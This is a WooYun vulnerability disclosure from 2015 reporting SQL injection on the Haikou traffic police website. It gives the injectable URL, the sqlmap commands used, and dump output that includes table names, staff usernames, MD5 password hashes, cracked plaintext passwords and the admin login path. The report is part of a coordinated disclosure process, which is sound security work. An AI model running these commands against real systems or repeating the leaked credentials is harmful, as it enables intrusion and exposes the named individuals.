当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113098

漏洞标题:海口交警队SQL注入一枚(已经获取管理员密码)

相关厂商:海口交警队

漏洞作者: 小天

提交时间:2015-05-20 16:48

修复时间:2015-07-05 10:00

公开时间:2015-07-05 10:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-21: 厂商已经确认,细节仅向厂商公开
2015-05-31: 细节向核心白帽子及相关领域专家公开
2015-06-10: 细节向普通白帽子公开
2015-06-20: 细节向实习白帽子公开
2015-07-05: 细节向公众公开

简要描述:

额,,好不容易找到个漏洞,,乌云一搜,额,竟然存在了,,额,,可惜了,,不过我仔细一看,,,,竟然只修局部,,不管整体,,,

详细说明:

WooYun: 由某交警队的一个SQL注入引发的巨大的血案
请看上个链接,,也是关于这个域名的,
但是经过我测试,,上个链接的漏洞已经不存在了,,
但是下面这个链接,,漏洞依然在,,
SQL注入点:http://www.hkjxj.gov.cn/php/pages_jxjfc.php?tp_xuh=258
,管理员账号密码已拿到
sqlmap.py -u http://www.hkjxj.gov.cn/php/pages_jxjfc.php?tp_xuh=258 --dbs
back-end DBMS: MySQL 5.0.12
[08:54:27] [INFO] fetching database names
[08:54:27] [INFO] the SQL query used returns 3 entries
[08:54:27] [INFO] retrieved: information_schema
[08:54:27] [INFO] retrieved: dbjxj
[08:54:27] [INFO] retrieved: test
available databases [3]:
[*] dbjxj
[*] information_schema
[*] test
Database: dbjxj
[28 tables]
+---------------+
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| tb_danyuan |
| tb_daohang |
| tb_fankui |
| tb_huifu |
| tb_huiyuan |
| tb_huiyuanzu |
| tb_jianduyuan |
| tb_jishuqi |
| tb_lanmu |
| tb_liebiao |
| tb_liuyan |
| tb_moban |
| tb_pinglun |
| tb_survey |
| tb_tiezi |
| tb_timu |
| tb_toupiao |
| tb_tuji |
| tb_tupian |
| tb_weizhang |
| tb_wenzhang |
| tb_yongh |
| udf_temp |
+---------------+
sqlmap.py -u http://www.hkjxj.gov.cn/php/pages_jxjfc.php?tp_x
uh=258 --dump -T tb_yongh -D dbjxj
[08:58:08] [INFO] retrieved: "cid","varchar(20)"
[08:58:08] [INFO] retrieved: "cmim","varchar(100)"
[08:58:08] [INFO] retrieved: "cyonghm","varchar(30)"
[08:58:08] [INFO] retrieved: "cquanx","text"
[08:58:08] [INFO] retrieved: "cxinw","text"
[08:58:08] [INFO] retrieved: "nbuxsh","int(11)"
[08:58:08] [INFO] retrieved: "nshenh","int(11)"
[08:58:08] [INFO] retrieved: "nxiugws","int(11)"
[08:58:09] [INFO] retrieved: "nxiug","int(11)"
[08:58:09] [INFO] retrieved: "hkjxj","7ce385876b9d27babc2aead40a7f7c47","
[08:58:09] [INFO] retrieved: "陈冠积","8e264d3392d79994858ddcacb8b0aa71","
...
[08:58:10] [INFO] retrieved: "周信圩","fc54dff0b1219c3ad0b80785ea523a3c","
;信...
[08:58:10] [INFO] retrieved: "吴士茂","33d0b17ad21e7e0aea546be7efbe0186","

7ce385876b9d27babc2aead40a7f7c47 MD5 : ~!@#$%^&*()_+
8e264d3392d79994858ddcacb8b0aa71 [Not found]
fc54dff0b1219c3ad0b80785ea523a3c MD5 : fzk-198206
33d0b17ad21e7e0aea546be7efbe0186 MD5 : 8650013a!
后台登陆点:http://www.hkjxj.gov.cn/admin/index.php
不过查询出错,,,仔细看了一下,应该就是这个表的啊,,难道不是这个表吗,,,,,
不管了,,反正是存在注入点:

漏洞证明:

rt

修复方案:

过滤

版权声明:转载请注明来源 小天@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-21 10:00

厂商回复:

非常感谢!
你所提交的漏洞已验证,会尽快修复。

最新状态:

暂无